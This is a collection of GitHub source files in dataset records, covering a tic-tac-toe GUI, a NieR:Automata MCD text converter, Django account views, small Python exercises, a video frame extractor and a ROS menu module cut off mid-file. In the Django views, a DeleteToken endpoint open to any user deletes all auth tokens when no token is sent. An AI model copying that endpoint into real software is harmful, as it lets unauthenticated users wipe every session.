b[2][0].config(bg='gray')\r\n        b[1][1].config(bg='gray')\r\n        b[0][2].config(bg='gray')\r\n        stop_game=True    \r\nroot=Tk()\r\nroot.title(\"TIC TAC TOE \")\r\n\r\nb=[[0,0,0,],\r\n   [0,0,0,],\r\n   [0,0,0]]\r\nstates=[[0,0,0],\r\n        [0,0,0],\r\n        [0,0,0]]\r\nfor i in range(3):\r\n    for j in range(3):\r\n        b[i][j]=Button(font=(\"Arial\",60),width=4,bg='powder blue',\r\n                       command=lambda n=i,m=j: callback(n,m))\r\n        b[i][j].grid(row=i,column=j)\r\nplayer='😍'\r\nstop_game=False\r\nroot.mainloop()\r\n 
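# check_for_winner() highlights the winning row, column, or diagonal in gray; stop_game then blocks further moves in callback().\r\n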
","repo_name":"Repidex/GUI-Applications","sub_path":"Tic-tac-toe/tic-tack-toe.py","file_name":"tic-tack-toe.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2199589766","text":"import copy\nimport os, sys\nimport json\nimport ioUtils\nimport zlib\n\ndef hash_event_name(name):\n return zlib.crc32(name.lower().encode(\"utf-8\")) & ~0x80000000 # HAH gotem platinum\n\n# https://github.com/synspawacza/nier_automata_localization\ndef calc_eager_padding(offset, mod): \n return mod - (offset % mod)\n\ndef write_eager_padding(offset, mod):\n return b\"\\0\" * calc_eager_padding(offset, mod)\n\nclass Header:\n struct_size = 40\n\n def from_mcd(self, file):\n self.messages_offset = ioUtils.read_int32(file)\n self.messages_count = ioUtils.read_int32(file)\n self.symbols_offset = ioUtils.read_int32(file)\n self.symbols_count = ioUtils.read_int32(file)\n self.glyphs_offset = ioUtils.read_int32(file)\n self.glyphs_count = ioUtils.read_int32(file)\n self.fonts_offset = ioUtils.read_int32(file)\n self.fonts_count = ioUtils.read_int32(file)\n self.events_offset = ioUtils.read_int32(file)\n self.events_count = ioUtils.read_int32(file)\n\n return self\n\n def write_file(self, file):\n ioUtils.write_Int32(file, self.messages_offset)\n ioUtils.write_Int32(file, self.messages_count)\n ioUtils.write_Int32(file, self.symbols_offset)\n ioUtils.write_Int32(file, self.symbols_count)\n ioUtils.write_Int32(file, self.glyphs_offset)\n ioUtils.write_Int32(file, self.glyphs_count)\n ioUtils.write_Int32(file, self.fonts_offset)\n ioUtils.write_Int32(file, self.fonts_count)\n ioUtils.write_Int32(file, self.events_offset)\n ioUtils.write_Int32(file, self.events_count)\n\nclass Line:\n struct_size = 24\n\n def from_mcd(self, file):\n content_offset = ioUtils.read_int32(file)\n self.padding = ioUtils.read_int32(file)\n content_length = ioUtils.read_int32(file)\n ioUtils.read_int32(file)\n self.below = ioUtils.read_float(file)\n self.horiz = ioUtils.read_float(file)\n\n last_pos = file.tell()\n self.content = []\n file.seek(content_offset)\n for i in range(content_length):\n val = ioUtils.read_int16(file)\n if val < -32000:\n val = val & 0xFFFF\n self.content.append(val)\n file.seek(last_pos)\n\n return self\n\n def to_string(self, symbols_glyph_Dict, font): # I stole this :) https://github.com/synspawacza/nier_automata_localization\n result = \"\"\n idx = 0\n while idx < len(self.content) - 1:\n char_id = self.content[idx]\n if char_id < 0x8000:\n result += symbols_glyph_Dict[char_id].char\n if symbols_glyph_Dict[char_id].font_id != font.id:\n raise Exception(\"Font mismatch\")\n idx += 2 # skip kerning\n elif char_id == 0x8001:\n result += \" \"\n #result += f\"[SET_FONT:{self.content[idx+1]}]\"\n idx += 2 # skip font id\n elif char_id == 0x8000:\n # text end\n idx += 1\n elif char_id == 0x8020:\n result += \"\"\n idx += 2\n else:\n # using '<' and '>' for tagging - hopefully it doesn't break anything\n result += \"\"\n idx += 2 # skip kerning\n return result\n\n def from_string(self, string, symbols, font, kernings):\n self.content = []\n self.padding = 0\n self.below = 0\n self.horiz = 0\n for i, char in enumerate(string):\n if (char == \" \"):\n self.content.append(0x8001)\n self.content.append(font.id)\n else:\n for symbol in symbols:\n if symbol.font_id != font.id:\n continue\n glyph_found = False\n if symbol.char == char:\n val = symbol.glyph_id\n glyph_found = True\n break\n self.below = font.below\n\n if not 
glyph_found:\n raise Exception(\"Glyph not found in font \" + str(font.id) + \": \" + char)\n self.content.append(val)\n\n # Get next char\n if i + 1 < len(string):\n next_char = string[i + 1]\n combined = char + next_char\n if combined in kernings[font.id]:\n self.content.append(round(kernings[font.id][combined][\"kerning_num\"]))\n else:\n self.content.append(0)\n else:\n self.content.append(0)\n\n self.content.append(0x8000)\n return self\n\nclass Text:\n struct_size = 20\n\n def from_mcd(self, file):\n lines_offset = ioUtils.read_int32(file)\n lines_count = ioUtils.read_int32(file)\n self.vpos = ioUtils.read_int32(file)\n self.hpos = ioUtils.read_int32(file)\n self.font = ioUtils.read_int32(file)\n\n last_pos = file.tell()\n self.lines = []\n file.seek(lines_offset)\n for i in range(lines_count):\n self.lines.append(Line().from_mcd(file))\n file.seek(last_pos)\n\n return self\n\n def from_json(self, json, symbols, fonts_dict, kernings):\n self.lines = []\n self.vpos = json[\"vpos\"]\n self.hpos = json[\"hpos\"]\n self.font = json[\"font\"]\n split_lines = json[\"line\"].split(\"\\n\")\n for line in split_lines:\n self.lines.append(Line().from_string(line, symbols, fonts_dict[self.font], kernings))\n\n return self\n\n def to_string(self, symbols_char_Dict, fonts_dict):\n return \"\\n\".join([line.to_string(symbols_char_Dict, fonts_dict[self.font]) for line in self.lines])\n\nclass Message:\n struct_size = 16\n\n def from_mcd(self, file):\n texts_offset = ioUtils.read_int32(file)\n texts_count = ioUtils.read_int32(file)\n self.seq_number = ioUtils.read_int32(file)\n self.event_id = ioUtils.read_int32(file)\n\n return_pos = file.tell()\n self.texts = []\n file.seek(texts_offset)\n for i in range(texts_count):\n self.texts.append(Text().from_mcd(file))\n file.seek(return_pos)\n\n return self\n\n def from_json(self, json, seq_number, symbols, fonts_dict, kernings):\n self.seq_number = seq_number\n self.event_name = json[\"event_name\"]\n self.event_id = hash_event_name(self.event_name)\n self.texts = []\n for text in json[\"texts\"]:\n self.texts.append(Text().from_json(text, symbols, fonts_dict, kernings))\n\n return self\n\nclass Symbol:\n struct_size = 8\n\n def from_mcd(self, file):\n self.font_id = ioUtils.read_int16(file)\n self.char = file.read(2).decode(\"utf-16-le\")\n self.glyph_id = ioUtils.read_int32(file)\n\n return self\n\nclass Event:\n struct_size = 40\n\n def from_mcd(self, file):\n self.id = ioUtils.read_int32(file)\n self.idx = ioUtils.read_int32(file)\n self.name = file.read(32).decode(\"utf-8\").rstrip(\"\\0\")\n\n return self\n\n def from_message(self, name, message_idx):\n self.id = hash_event_name(name)\n self.idx = message_idx\n self.name = name\n\n return self\n\nclass Font:\n struct_size = 20\n\n def from_mcd(self, file):\n self.id = ioUtils.read_int32(file)\n self.width = ioUtils.read_float(file)\n self.height = ioUtils.read_float(file)\n self.below = ioUtils.read_float(file)\n self.horiz = ioUtils.read_float(file)\n\n return self\n\nclass MCD:\n def from_mcd(self, file):\n self.header = Header().from_mcd(file)\n\n file.seek(self.header.messages_offset)\n self.messages = []\n for i in range(self.header.messages_count):\n self.messages.append(Message().from_mcd(file))\n\n file.seek(self.header.symbols_offset)\n self.symbols = []\n for i in range(self.header.symbols_count):\n self.symbols.append(Symbol().from_mcd(file))\n\n # Imma just skip over glyphs for now\n file.seek(self.header.glyphs_offset)\n self.glyphs = file.read(self.header.glyphs_count * 40)\n\n 
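# Editor's annotation (not in the original record): each glyph entry read\n        # above is 40 opaque bytes; write_file later copies them back verbatim.\n        # The per-line text streams parsed earlier are uint16 codes: values\n        # below 0x8000 are glyph ids, each followed by a kerning value for the\n        # next pair; 0x8001 encodes a space and is followed by a font id; and\n        # 0x8000 terminates a line. So a two-glyph word with ids 7 and 12 and\n        # kerning 2 between them serializes as [7, 2, 12, 0, 0x8000].\n\n        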
file.seek(self.header.fonts_offset)\n self.fonts = []\n for i in range(self.header.fonts_count):\n self.fonts.append(Font().from_mcd(file))\n\n file.seek(self.header.events_offset)\n self.events = []\n for i in range(self.header.events_count):\n self.events.append(Event().from_mcd(file))\n\n self.generate_events_Dict()\n self.generate_fonts_Dict()\n self.generate_symbols_char_Dict()\n self.generate_symbols_glyph_Dict()\n\n self.kernings = {}\n self.generate_kernings()\n\n return self\n\n def generate_events_Dict(self):\n self.events_Dict = {}\n for event in self.events:\n self.events_Dict[event.id] = event\n\n def generate_symbols_char_Dict(self):\n self.symbols_char_Dict = {}\n for symbol in self.symbols:\n self.symbols_char_Dict[symbol.char] = symbol\n\n def generate_symbols_glyph_Dict(self):\n self.symbols_glyph_Dict = {}\n for symbol in self.symbols:\n self.symbols_glyph_Dict[symbol.glyph_id] = symbol\n\n def generate_fonts_Dict(self):\n self.fonts_Dict = {}\n for font in self.fonts:\n self.fonts_Dict[font.id] = font\n\n # This function is gonked, should probably not use for now\n def generate_kernings(self):\n for font in self.fonts:\n self.kernings[font.id] = {}\n\n for message in self.messages:\n for text in message.texts:\n font = self.fonts_Dict[text.font]\n for line in text.lines:\n idx = 0\n while idx < len(line.content):\n val = line.content[idx]\n if val < 0x8000:\n char = self.symbols_glyph_Dict[val].char\n kerning = line.content[idx+1]\n if kerning != 0:\n next_val = line.content[idx+2]\n if next_val < 0x8000:\n next_char = self.symbols_glyph_Dict[next_val].char\n if char + next_char in self.kernings[font.id]:\n self.kernings[font.id][char + next_char][\"kerning_num\"] += kerning\n self.kernings[font.id][char + next_char][\"count\"] += 1\n else:\n self.kernings[font.id][char + next_char] = {\n \"kerning_num\": kerning,\n \"count\": 1\n }\n idx += 2\n elif val == 0x8001:\n idx += 2\n elif val == 0x8000:\n idx += 2\n\n for font in self.kernings.keys():\n for kerning in self.kernings[font].keys():\n self.kernings[font][kerning][\"kerning_num\"] /= self.kernings[font][kerning][\"count\"]\n\n #with open(\"kernings.json\", \"w\") as file:\n # json.dump(self.kernings, file, indent=4)\n\n def update_from_json(self, json):\n # Events\n self.events = []\n for i, message in enumerate(json[\"messages\"]):\n self.events.append(Event().from_message(message[\"event_name\"], i))\n self.events.sort(key=lambda x: x.id)\n self.generate_events_Dict()\n\n # Messages\n self.messages = []\n seq_number = json[\"starting_seq_number\"]\n for message in json[\"messages\"]:\n self.messages.append(Message().from_json(message, seq_number, self.symbols, self.fonts_Dict, self.kernings))\n seq_number += 1\n\n # Header\n self.header.messages_count = len(self.messages)\n self.header.events_count = len(self.events)\n\n def to_json(self):\n json_data = {}\n json_data[\"starting_seq_number\"] = self.messages[0].seq_number\n json_data[\"messages\"] = []\n\n for msg in self.messages:\n json_data[\"messages\"].append({\n \"event_name\": self.events_Dict[msg.event_id].name,\n \"texts\": []\n })\n for text in msg.texts:\n json_data[\"messages\"][-1][\"texts\"].append({\n \"vpos\": text.vpos,\n \"hpos\": text.hpos,\n \"font\": text.font,\n \"line\": text.to_string(self.symbols_glyph_Dict, self.fonts_Dict)\n })\n\n json_data[\"fonts\"] = []\n for font in self.fonts:\n json_data[\"fonts\"].append({\n \"id\": font.id,\n \"symbols\": []\n })\n for symbol in self.symbols:\n if symbol.font_id == font.id:\n 
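# Annotation (not in the original record): this rescans every symbol\n                    # for every font, O(fonts x symbols); grouping self.symbols once\n                    # into a dict keyed by font_id would emit each table in one pass.\n                    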
json_data[\"fonts\"][-1][\"symbols\"].append({\n \"char\": symbol.char,\n \"glyph_id\": symbol.glyph_id\n })\n return json_data\n\n def write_file(self, file): # https://github.com/synspawacza/nier_automata_localization\n current_offset = Header.struct_size\n\n strings = []\n strings_offsets = []\n\n texts = []\n texts_offsets = []\n\n lines = []\n lines_offsets = []\n\n for message in self.messages:\n for text in message.texts:\n texts.append(text)\n for line in text.lines:\n strings.append(line.content)\n strings_offsets.append(current_offset)\n current_offset += len(line.content) * 2\n lines.append(line)\n current_offset += calc_eager_padding(current_offset, 4)\n\n # Update header offsets\n self.header.messages_offset = current_offset\n current_offset += self.header.messages_count * Message.struct_size\n current_offset += calc_eager_padding(current_offset, 4)\n\n for i in range(len(texts)):\n texts_offsets.append(current_offset + i * Text.struct_size)\n current_offset += len(texts) * Text.struct_size\n current_offset += calc_eager_padding(current_offset, 4)\n\n for i in range(len(lines)):\n lines_offsets.append(current_offset + i * Line.struct_size)\n current_offset += len(lines) * Line.struct_size\n current_offset += calc_eager_padding(current_offset, 4)\n\n self.header.symbols_offset = current_offset\n self.header.symbols_count = len(self.symbols)\n current_offset += self.header.symbols_count * Symbol.struct_size + 4\n\n self.header.glyphs_offset = current_offset\n current_offset += self.header.glyphs_count * 40 + 4\n\n self.header.fonts_offset = current_offset\n self.header.fonts_count = len(self.fonts)\n current_offset += self.header.fonts_count * Font.struct_size + 4\n\n self.header.events_offset = current_offset\n\n # Write header\n self.header.write_file(file)\n \n # Write strings\n for string in strings:\n for v in string:\n val = v\n if val < 0:\n ioUtils.write_Int16(file, val)\n else:\n ioUtils.write_uInt16(file, val)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write messages\n texts_offset_idx = 0\n for message in self.messages:\n texts_offset = texts_offsets[texts_offset_idx]\n texts_offset_idx += len(message.texts)\n ioUtils.write_uInt32(file, texts_offset)\n ioUtils.write_uInt32(file, len(message.texts))\n ioUtils.write_uInt32(file, message.seq_number)\n ioUtils.write_uInt32(file, message.event_id)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write texts\n lines_offset_idx = 0\n for text in texts:\n lines_offset = lines_offsets[lines_offset_idx]\n lines_offset_idx += len(text.lines)\n ioUtils.write_uInt32(file, lines_offset)\n ioUtils.write_uInt32(file, len(text.lines))\n ioUtils.write_uInt32(file, text.vpos)\n ioUtils.write_uInt32(file, text.hpos)\n ioUtils.write_uInt32(file, text.font)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write lines\n strings_idx = 0\n for line in lines:\n strings_offset = strings_offsets[strings_idx]\n strings_idx += 1\n ioUtils.write_uInt32(file, strings_offset)\n ioUtils.write_uInt32(file, line.padding)\n ioUtils.write_uInt32(file, len(line.content))\n ioUtils.write_uInt32(file, len(line.content))\n ioUtils.write_float(file, line.below)\n ioUtils.write_float(file, line.horiz)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write symbols\n for symbol in self.symbols:\n ioUtils.write_uInt16(file, symbol.font_id)\n ioUtils.write_utf16(file, symbol.char, 2)\n ioUtils.write_uInt32(file, symbol.glyph_id)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write glyphs\n file.write(self.glyphs)\n 
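# Annotation (not in the original record): calc_eager_padding(offset, mod)\n        # returns mod - (offset % mod), so an already aligned offset still gets a\n        # full block: calc_eager_padding(8, 4) == 4, while offset 10 needs 2 bytes.\n        # write_file computes every section offset with this eager variant, so\n        # swapping in the usual (-offset) % mod would shift the whole layout.\n        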
file.write(write_eager_padding(file.tell(), 4))\n\n # Write fonts\n for font in self.fonts:\n ioUtils.write_uInt32(file, font.id)\n ioUtils.write_float(file, font.width)\n ioUtils.write_float(file, font.height)\n ioUtils.write_float(file, font.below)\n ioUtils.write_float(file, font.horiz)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write events\n for event in self.events:\n ioUtils.write_uInt32(file, event.id)\n ioUtils.write_uInt32(file, event.idx)\n ioUtils.write_utf8(file, event.name, 32)\n\n \ndef mcd_to_json(mcd_file, out_file=None):\n with open(mcd_file, 'rb') as file:\n mcd = MCD().from_mcd(file)\n\n if out_file is None:\n out_file = os.path.splitext(mcd_file)[0] + \".json\"\n\n with open(out_file, \"w\", encoding=\"utf8\") as f:\n json_data = mcd.to_json()\n json_str = json.dumps(json_data, indent=4, ensure_ascii=False)\n f.write(json_str)\n\n print(\"Wrote\", out_file)\n\ndef json_to_mcd(json_file, mcd_file, out_file=None):\n with open(mcd_file, 'rb') as file:\n mcd = MCD().from_mcd(file)\n\n #org_mcd = copy.deepcopy(mcd)\n mcd.update_from_json(json.load(open(json_file, \"r\", encoding=\"utf8\")))\n\n if out_file is None:\n out_file = os.path.splitext(json_file)[0] + \".mcd\"\n\n with open(out_file, \"wb\") as file:\n mcd.write_file(file)\n\n print(\"Wrote\", out_file)\n\ndef print_usage():\n print(\"Usage:\\tmcd.py [output json file]\"\n \"\\n\\tmcd.py [output mcd file]\"\n \"\\nInfo:\\t- If no output file is specified, the input file name will be used with the appropriate extension.\"\n \"\\n\\t- is used as the base for fonts/glyphs used in the new mcd file.\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print_usage()\n\n if sys.argv[1] in [\"-h\", \"--help\"]:\n print_usage()\n\n in_file = sys.argv[1]\n\n in_file = os.path.normpath(in_file)\n in_file_ext = os.path.splitext(in_file)[1]\n\n # MCD to JSON\n if in_file_ext == \".mcd\":\n out_file = None\n if len(sys.argv) > 2:\n out_file = sys.argv[2]\n out_file = os.path.normpath(out_file)\n\n mcd_to_json(in_file, out_file)\n \n # JSON to MCD\n if in_file_ext == \".json\":\n if len(sys.argv) < 3:\n print_usage()\n \n mcd_file = sys.argv[2]\n mcd_file = os.path.normpath(mcd_file)\n\n out_file = None\n if len(sys.argv) > 3:\n out_file = sys.argv[3]\n out_file = os.path.normpath(out_file)\n\n json_to_mcd(in_file, mcd_file, out_file)","repo_name":"WoefulWolf/Automata_MCD_Patcher","sub_path":"mcd.py","file_name":"mcd.py","file_ext":"py","file_size_in_byte":20322,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"5139614352","text":"from django.shortcuts import render\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth.models import User\nfrom account.serializers import AccountSerializer\nfrom rest_framework import status\nfrom rest_framework import exceptions\nfrom django.contrib.auth import hashers\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.authtoken.models import Token\n\n\n# Create your views here.\nclass Register(GenericAPIView):\n \"\"\"\n 注册用户的视图\n \"\"\"\n queryset = User.objects.all()\n serializer_class = AccountSerializer\n\n def get(self, request):\n data = self.get_queryset()\n return Response(status.HTTP_403_FORBIDDEN) # 返回403禁止访问这个路由\n\n def post(self, request):\n data = request.data\n if isinstance(data, dict): # 一次只能创建一个用户,其他情况直接400\n many = False\n else:\n return Response(status.HTTP_400_BAD_REQUEST)\n 
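# Annotation (not in the original record): Response(status.HTTP_400_BAD_REQUEST)\n        # above passes the integer 400 as the response body and still returns HTTP 200;\n        # sending an actual 400 needs the keyword form Response(status=status.HTTP_400_BAD_REQUEST),\n        # and the 403 returned from get() has the same issue. get_serializer() below\n        # comes from GenericAPIView, and is_valid(raise_exception=True) lets DRF turn\n        # invalid input into an HTTP 400 response with per-field errors, so no explicit\n        # error branch is needed after it.\n        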
serializer = self.get_serializer(data=request.data, many=many)\n serializer.is_valid(raise_exception=True) # 校验是否合法\n serializer.save()\n user = {\n 'username': serializer.data['username'], # 返回用户名\n 'is_active': serializer.data['is_active'] # 返回密码\n }\n return Response(user)\n\n\nclass DeleteUser(GenericAPIView):\n \"\"\"\n 删除用户的视图\n \"\"\"\n queryset = User.objects.all()\n serializer_class = AccountSerializer\n\n @staticmethod\n def is_existence(self, request):\n existence = True # 原始设置为True,不存在用户,密码不对都设置为False\n data = request.data\n username = data['username']\n password = data['password']\n result_factual = User.objects.filter(username=username) # 筛选是否存在该用户\n if len(result_factual) == 1:\n result = self.get_queryset() # 找到表中所有用户\n result = self.get_serializer(result, many=True)\n for i in result.data: # 循环找到前端传来的user信息\n if username == i['username']:\n temp_password = i['password']\n if hashers.check_password(password, temp_password): # 密码存在,校验通过,执行删除\n result_factual.delete() # 将查询到的用户结果删除\n else:\n raise exceptions.ValidationError('密码不正确!')\n existence = False\n break\n else:\n pass\n\n else:\n raise exceptions.ValidationError('不存在该用户!')\n existence = False # 不存在该用户,设置为False\n\n return existence\n\n def delete(self, request):\n if self.is_existence(self, request=request):\n detail = request.data['username'] + '已被删除!'\n return Response(detail)\n\n\nclass DeleteToken(GenericAPIView):\n queryset = Token.objects.all()\n\n permission_classes = [AllowAny]\n\n @staticmethod\n def delete_one_or_delete_all(self, request):\n \"\"\"\n 删除token\n \"\"\"\n token = request.auth\n user = request.user\n if token is not None:\n \"\"\"\n 如果前端传来一个参数token,则删除单个,否则删除所有token\n \"\"\"\n data = Token.objects.filter(key=token)\n if len(data) == 1:\n data.delete()\n return str(token) + '已被删除!'\n else:\n raise exceptions.ValidationError('不存在的token!')\n else:\n Token.objects.all().delete()\n return '所有token已被删除!'\n\n def delete(self, request):\n text = self.delete_one_or_delete_all(self, request)\n if text:\n return Response(text)","repo_name":"kaedePing/lightnovel","sub_path":"LightNovel/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72390499946","text":"from setuptools import setup, Extension\nfrom Cython.Build import cythonize\n\nextensions = [\n Extension(\"simplehod.simplehod\", [\"simplehod/simplehod.pyx\"])\n]\n\nsetup(\n name=\"simplehod\",\n version=\"0.0.1\",\n author=\"Yu Feng\",\n author_email=\"rainwoodman@gmail.com\",\n url=\"http://github.com/bccp/simplehod\",\n description=\"Simple HOD modelling of galaxy from simulation catalogs\",\n install_requires=['cython', 'numpy'],\n license='BSD-2-Clause',\n zip_safe = False,\n package_dir = {'simplehod': 'simplehod'},\n packages=['simplehod'],\n ext_modules = cythonize(extensions),\n)\n\n","repo_name":"bccp/simplehod","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15345113886","text":"def gen_to_tax(tax_rate):\n def to_tax(price):\n return price * (1 + tax_rate)\n return to_tax\n\nto_tax8 = gen_to_tax(0.08)\nto_tax10 = 
gen_to_tax(0.1)\n\nprint(to_tax8(1000))\nprint(to_tax8(2000))\nprint(to_tax10(1000))\nprint(to_tax10(2000))\n","repo_name":"kronos-fujimaru/python_intro","sub_path":"text/exercise/answers/06/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26486929863","text":"class Mascota:\n def __init__(self):\n self.codigo = []\n self.nombre = []\n self.edad = []\n self.animal = []\n self.raza = []\n self.vacuna = []\n self.estado = []\n def menu(self):\n opciones = \"\"\"\n *******SISTEMA DE MASCOTAS*******\n 1.- Registrar Mascotas\n 2.- Kardex de Mascotas\n 3.- Vacunar Mascota\n 4.- Salir\n \"\"\"\n print(opciones)\n eleccion = int(input(\"Elija una opcion del menu: \\n\"))\n if(eleccion == 1):\n print(self.agregarMascota())\n self.menu()\n elif (eleccion == 2):\n print(self.kardex())\n print(self.verMenu())\n elif (eleccion ==3):\n print(self.agregarVacuna())\n print(self.verMenu())\n elif(eleccion==4):\n print(\"Transacciones realizadas correctamente\")\n else:\n print(\"***DIGITE UNA OPCION DEL MENU***\")\n self.menu()\n\n def verMenu(self):\n eleccion = input(\"Desea volver al menu: s/n \\n\")\n if (eleccion == 's' or eleccion == 'S'):\n self.menu()\n else:\n return \"Transacciones realizadas correctamente\"\n\n def agregarMascota(self):\n print(\"***AGREGAR MASCOTAS***\")\n code = input(\"Ingrese el codigo para la mascota: \\n\")\n name = input(\"Ingrese el nombre su mascota: \\n\")\n age = int(input(\"Ingrese la edad en meses: \\n\"))\n animal = input(\"Ingrese el tipo de animal de su mascota: \\n\")\n type = input(\"Ingrese la raza: \\n\")\n print(self.guardarMascota(code, name, age, animal, type))\n agregarOtro = input(\"Desea registrar mascota.? 
s/n \\n\")\n if ( agregarOtro == 's' or agregarOtro == 'S'):\n self.agregarMascota()\n return \"Mascota(s) registrada(s) correctamente.!\"\n\n def guardarMascota(self, codigo, nombre, edad, animal, raza):\n self.codigo.append(codigo)\n self.nombre.append(nombre)\n self.edad.append(edad)\n self.animal.append(animal)\n self.raza.append(raza)\n self.vacuna.append(0)\n self.estado.append(1)\n return \"La mascota {} fue registrada exitosamente.!\".format(nombre)\n def kardex(self):\n if (self.codigo):\n for posicion in range(len(self.nombre)):\n self.descripcion(posicion)\n return \"Kardex cargado correctamente\"\n else:\n return \"Todavia no hay datos registrados\"\n\n\n def descripcion(self, posicion):\n print(\"****MASCOTA {}***\".format(self.codigo[posicion]))\n print(\"Nombre: {} \".format(self.nombre[posicion]))\n print(\"Edad: {} meses\".format(self.edad[posicion]))\n print(\"Tipo Animal: {}\".format(self.animal[posicion]))\n print(\"Raza: {}\".format(self.raza[posicion]))\n if (self.vacuna[posicion] == 1 ):\n print(\"Vacunado: SI\".format(self.vacuna[posicion]))\n else:\n print(\"Vacunado: NO\".format(self.vacuna[posicion]))\n pass\n def buscarMascota(self):\n codigo = input(\"Ingrese el codigo de la mascota: \\n\")\n posicion = self.codigo.index(codigo)\n return posicion\n\n def agregarVacuna(self):\n posicion = self.buscarMascota()\n return self.vacunarMascota(posicion)\n\n def vacunarMascota(self, posicion):\n self.vacuna[posicion] = 1\n return \"La mascota {} fue vacunada exitosamente.!\".format(self.nombre[posicion])\n\nmascotas = Mascota()\nmascotas.menu()\n","repo_name":"amilkarcruz13/class-on-python-programing-III-upc-2020","sub_path":"mascotas.py","file_name":"mascotas.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"39384035334","text":"from os.path import basename\nfrom os.path import exists\nfrom os.path import isfile\nfrom pathlib import Path\nfrom shutil import rmtree\n\nimport cv2\n\n\ndef video_to_frames(video_filename, output_dir, skip_if_dir_exists=False):\n print(\"Start extracting frames from {} to {}\".format(video_filename, output_dir))\n output_dir_path = Path(output_dir)\n video_basename = basename(video_filename).split('.')[0]\n if skip_if_dir_exists is True and output_dir_path.exists():\n print(\n \"Frame directory '{}' exists. \"\n \"Skipping extracting frames from {}\".format(output_dir, video_filename)\n )\n return\n\n if output_dir_path.exists():\n rmtree(output_dir)\n\n output_dir_path.mkdir(0o777, parents=True, exist_ok=False)\n\n if exists(video_filename) and isfile(video_filename):\n print(\"File {} exists\".format(video_filename))\n else:\n print(\"File {} does not exist!\".format(video_filename))\n\n vidcap = cv2.VideoCapture(str(video_filename))\n print(\"VideoCapture of {} created? 
{}\".format(video_filename, vidcap.isOpened()))\n\n if not vidcap.isOpened():\n raise IOError\n\n success, image = vidcap.read()\n count = 0\n print(\n \"Extracting frames from video '{}' to folder '{}'...\".format(\n video_filename, output_dir\n )\n )\n while success:\n cv2.imwrite(f\"{output_dir}/{video_basename}_frame-{count:05d}.png\", image)\n success, image = vidcap.read()\n count += 1\n\n print(f\"{count} frames extracted\")","repo_name":"backup-test-123/flytekubecondemo2019","sub_path":"demoproject/utils/video_tools/video_to_frames.py","file_name":"video_to_frames.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29878414552","text":"import json\nimport subprocess\nimport os\nimport traceback\n\nfrom cabot_ui.cabot_rclpy_util import CaBotRclpyUtil\nimport std_msgs.msg\nfrom rcl_interfaces.msg import Parameter, ParameterType, ParameterValue\nfrom rcl_interfaces.srv import SetParameters, GetParameters\nfrom rclpy.callback_groups import MutuallyExclusiveCallbackGroup\nfrom rclpy.qos import QoSProfile, DurabilityPolicy\nimport rclpy.parameter\n\nimport cabot_common.util\nfrom cabot_ui import i18n\n\nclass Action(object):\n \"\"\"Menu Action abstract class\"\"\"\n def __init__(self, config, menu):\n self._menu = menu\n self._config = config\n\n def do_action(self):\n \"\"\"need to implement do_action in concreate class\"\"\"\n return False\n\nclass Actions(Action):\n \"\"\"Lisf of Actions\"\"\"\n @staticmethod\n def create_actions(config, menu):\n \"\"\"create menu action classes\"\"\"\n actions = Menu.get_menu_config(config, \"actions\")\n\n return Actions(actions, menu)\n\n def __init__(self, config, menu):\n super(Actions, self).__init__(config, menu)\n temp = []\n if config:\n for action in config:\n _type = Menu.get_menu_config(action, \"type\", error=True)\n \n if _type == \"publish_topic\":\n temp.append(PublishTopicAction(action, menu))\n elif _type == \"reconfigure\":\n temp.append(ReconfigureAction(action, menu))\n elif _type == \"syscommand\":\n temp.append(SyscommandAction(action, menu))\n else:\n raise RuntimeError(\"%s action is not defined\" % (_type))\n\n temp.append(MenuSelectAction(None, menu))\n\n self.actions = temp\n\n def do_action(self):\n result = True\n for action in self.actions:\n result = result and action.do_action()\n return result\n\n def __str__(self):\n return str(self.actions)\n\ndef my_import(name):\n components = name.split('.')\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\nclass PublishTopicAction(Action):\n \"\"\"Menu Action for publishing topic\"\"\"\n def __init__(self, config, menu):\n super(PublishTopicAction, self).__init__(config, menu)\n self._topic = Menu.get_menu_config(config, \"topic\", error=True)\n msg_type_str = Menu.get_menu_config(config, \"msg_type\", default=\"std_msgs.msg.String\")\n self._msg_type = my_import(msg_type_str)\n \n if self._topic is not None:\n ### needs to update with custom message typep\n latching_qos = QoSProfile(depth=1,\n durability=DurabilityPolicy.TRANSIENT_LOCAL)\n self._pub = CaBotRclpyUtil.instance().node.create_publisher(self._msg_type, self._topic, qos_profile=latching_qos)\n\n def do_action(self):\n curr = self._menu.value\n if curr is not None:\n if isinstance(curr, Menu):\n curr = curr.value\n if curr is not None:\n msg = self._msg_type()\n msg.data = curr\n self._pub.publish(msg)\n return True\n return False\n\n\nclass 
